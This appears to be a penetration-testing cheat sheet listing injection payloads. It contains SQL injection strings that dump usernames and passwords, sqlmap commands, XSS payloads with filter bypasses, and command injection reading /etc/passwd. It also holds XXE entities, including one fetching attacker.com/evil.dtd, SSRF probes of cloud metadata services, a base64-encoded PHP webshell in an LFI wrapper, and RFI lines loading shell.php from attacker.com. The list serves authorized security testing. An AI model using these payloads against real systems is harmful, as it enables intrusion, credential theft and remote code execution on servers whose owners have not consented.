Injection vulnerabilities

SQL Injection (SQLi)

Manual Testing:
1. Basic tests
   ' OR '1'='1' --
   ' OR '1'='1' /*
   ') OR ('1'='1
   
2. Union-based
   ' UNION SELECT NULL, NULL, NULL --
   ' UNION SELECT username, password FROM users --
   
3. Time-based blind
   ' AND SLEEP(5) --
   ' AND IF(1=1, SLEEP(5), 0) --
   
4. Boolean-based blind
   ' AND 1=1 --  (True)
   ' AND 1=2 --  (False)
   
5. Error-based
   ' AND 1=CONVERT(int, (SELECT @@version)) --

Automated

# sqlmap (powerful but noisy)
sqlmap -u "https://target.com/page?id=1" --batch --dbs

# With authenticated session
sqlmap -u "https://target.com/api/user?id=1" \
  --cookie="session=YOUR_SESSION_TOKEN" \
  --batch --dbs --level=5 --risk=3

# POST request
sqlmap -r request.txt --batch --dbs

Cross-Site Scripting (XSS)

Types:
1. Reflected XSS (in URL, reflected back)
2. Stored XSS (saved in database)
3. DOM-based XSS (JavaScript manipulation)

Basic Payloads:
1. <script>alert(1)</script>
2. <img src=x onerror=alert(1)>
3. <svg onload=alert(1)>
4. javascript:alert(1)
5. <iframe src=javascript:alert(1)>

Bypass Filters:
1. Uppercase: <ScRiPt>alert(1)</sCrIpT>
2. URL encoding: %3Cscript%3Ealert(1)%3C/script%3E
3. Double encoding: %253Cscript%253E
4. Unicode: \u003cscript\u003e
5. HTML entities: &lt;script&gt;alert(1)&lt;/script&gt;
6. Event handlers: <body onload=alert(1)>
7. Mixed case tags: <ScRiPt>alert(1)</sCrIpT>

Automated

# XSStrike
python3 xsstrike.py -u "https://target.com/search?q=test"

# Dalfox
dalfox url https://target.com/search?q=test

# nuclei XSS templates
nuclei -u https://target.com -tags xss

Command Injection

Payloads:
1. Basic
   ; ls
   | ls
   & ls
   && ls
   || ls
   
2. Chained
   ; whoami; ls -la
   | cat /etc/passwd
   
3. Backticks
   `whoami`
   $(whoami)
   
4. With input
   file.txt; cat /etc/passwd #
   
5. Blind (time-based)
   ; sleep 10
   | ping -c 10 127.0.0.1

Test Windows:
   & dir
   | dir
   && dir

XML External Entity (XXE)

Basic XXE:
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

SSRF via XXE:
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server/admin">
]>

Out-of-band (OOB):
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>

Server-Side Request Forgery (SSRF)

Payloads:
1. Internal network
   http://127.0.0.1
   http://localhost
   http://0.0.0.0
   http://[::1]
   http://192.168.1.1
   http://10.0.0.1
   http://172.16.0.1

2. Cloud metadata
   http://169.254.169.254/latest/meta-data/
   http://metadata.google.internal/computeMetadata/v1/
   http://169.254.169.254/metadata/instance?api-version=2021-02-01

3. Bypass filters
   http://127.1
   http://0x7f.0x0.0x0.0x1
   http://017700000001
   http://127.0.0.1.nip.io
   http://[::ffff:127.0.0.1]

4. Protocol smuggling
   gopher://127.0.0.1:6379/_SET%20key%20value
   dict://127.0.0.1:11211/stats
   file:///etc/passwd

Local/Remote File Inclusion

LFI Payloads:
1. Basic
   ../../../../etc/passwd
   ..%2F..%2F..%2F..%2Fetc%2Fpasswd
   
2. Null byte bypass (old PHP)
   ../../../../etc/passwd%00
   
3. Wrappers (PHP)
   php://filter/convert.base64-encode/resource=index.php
   data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
   expect://whoami
   
4. Log poisoning
   ../../../../var/log/apache2/access.log
   (After injecting PHP code in User-Agent)

RFI Payloads:
   http://attacker.com/shell.php
   \\attacker.com\share\shell.php